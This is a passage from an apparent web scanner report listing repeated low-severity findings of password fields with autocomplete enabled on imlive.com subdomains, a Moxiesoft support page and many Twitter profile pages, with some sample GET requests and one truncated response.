Host:	http://nl.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://nl.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.23. http://no.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://no.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.24. http://pu.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pu.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://pu.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.25. http://ru.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ru.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://ru.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: ru.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.26. http://se.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://se.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://se.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: se.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.27. http://support.moxiesoft.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://support.moxiesoft.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://support.moxiesoft.com/login.asp

The form contains the following password field with autocomplete enabled:

txtPasswd

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.28. http://tr.imlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://tr.imlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://tr.imlive.com/members.aspx

The form contains the following password field with autocomplete enabled:

txtPassword

Request

GET / HTTP/1.1
Host: tr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.29. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.30. http://twitter.com/247realmedia previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/247realmedia

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /247realmedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

12.31. http://twitter.com/AddThis previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/AddThis

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.32. http://twitter.com/Applebees previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Applebees

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.33. http://twitter.com/AshieApple previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/AshieApple

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.34. http://twitter.com/Beckett_News previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Beckett_News

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.35. http://twitter.com/BosHerald_Edge/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/BosHerald_Edge/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.36. http://twitter.com/ChrisLambton13 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ChrisLambton13

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.37. http://twitter.com/ConanOBrien previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ConanOBrien

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.38. http://twitter.com/DustinPedroia15 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/DustinPedroia15

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.39. http://twitter.com/ExpertDan previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ExpertDan

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ExpertDan HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.40. http://twitter.com/GQMagazine previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/GQMagazine

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.41. http://twitter.com/Gr8BosFoodBank previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Gr8BosFoodBank

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.42. http://twitter.com/Harvard previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Harvard

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.43. http://twitter.com/Jarvis_Green previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Jarvis_Green

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265288-56506-41031
ETag: "1fbdd011dd022432b9be5211b927eb5e"
Last-Modified: Sat, 29 Jan 2011 01:41:28 GMT
X-Runtime: 0.00821
Content-Type: text/html; charset=utf-8
Content-Length: 29885
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.44. http://twitter.com/JennyMcCarthy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/JennyMcCarthy

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.45. http://twitter.com/John_W_Henry previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/John_W_Henry

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.46. http://twitter.com/KaseyRKahl previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/KaseyRKahl

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.47. http://twitter.com/KhloeKardashian previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/KhloeKardashian

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.48. http://twitter.com/KimKardashian previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/KimKardashian

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.49. http://twitter.com/Late_Show previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Late_Show

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.50. http://twitter.com/LibertyHotel previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/LibertyHotel

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.51. http://twitter.com/Michael_Joseph previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Michael_Joseph

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.52. http://twitter.com/MittRomney previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/MittRomney

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.53. http://twitter.com/NewYorkPost previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/NewYorkPost

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.54. http://twitter.com/Nicole_114 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Nicole_114

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.55. http://twitter.com/Oprah previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Oprah

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.56. http://twitter.com/PageLines previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/PageLines

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.57. http://twitter.com/PhantomGourmet previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/PhantomGourmet

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.58. http://twitter.com/Prucenter previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Prucenter

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.59. http://twitter.com/PureADK previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/PureADK

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.60. http://twitter.com/ROBERTPLANT previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ROBERTPLANT

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.61. http://twitter.com/RealLamarOdom previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/RealLamarOdom

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.62. http://twitter.com/RobertDuffy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/RobertDuffy

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.63. http://twitter.com/ScampoLiberty previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ScampoLiberty

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.64. http://twitter.com/Script_Junkie previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Script_Junkie

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.65. http://twitter.com/Sean_P_Doyle previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Sean_P_Doyle

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.66. http://twitter.com/Servigistics previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Servigistics

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.67. http://twitter.com/ShaunieONeal previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ShaunieONeal

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.68. http://twitter.com/Simply_b06 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Simply_b06

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.69. http://twitter.com/Siobhan_Magnus previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Siobhan_Magnus

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.70. http://twitter.com/SlexAxton previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/SlexAxton

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.71. http://twitter.com/StarWrit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/StarWrit

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.72. http://twitter.com/Support previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Support

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.73. http://twitter.com/Svantasukhai previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Svantasukhai

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.74. http://twitter.com/THE_REAL_SHAQ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/THE_REAL_SHAQ

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.75. http://twitter.com/TV38Boston previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/TV38Boston

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.76. http://twitter.com/TechCrunch previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/TechCrunch

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /TechCrunch HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.77. http://twitter.com/TheKateBosworth previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/TheKateBosworth

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.78. http://twitter.com/Trackgals previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Trackgals

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.79. http://twitter.com/Trackgals/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/Trackgals/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.80. http://twitter.com/_juliannemoore previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/_juliannemoore

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.81. http://twitter.com/ajpiano previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ajpiano

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.82. http://twitter.com/androidnewsblog previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/androidnewsblog

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.83. http://twitter.com/backstreetboys previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/backstreetboys

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.84. http://twitter.com/benmezrich previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/benmezrich

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.85. http://twitter.com/bennadel previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/bennadel

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.86. http://twitter.com/bostonherald previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/bostonherald

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.87. http://twitter.com/cjronson previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/cjronson

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.88. http://twitter.com/cowboy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/cowboy

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.89. http://twitter.com/creationix previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/creationix

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.90. http://twitter.com/dandenney previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/dandenney

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.91. http://twitter.com/danwrong previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/danwrong

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

12.92. http://twitter.com/davevogler previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/davevogler

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.93. http://twitter.com/deionbranch84 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/deionbranch84

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.94. http://twitter.com/dougneiner previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/dougneiner

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

12.95. http://twitter.com/ebello previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/ebello

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
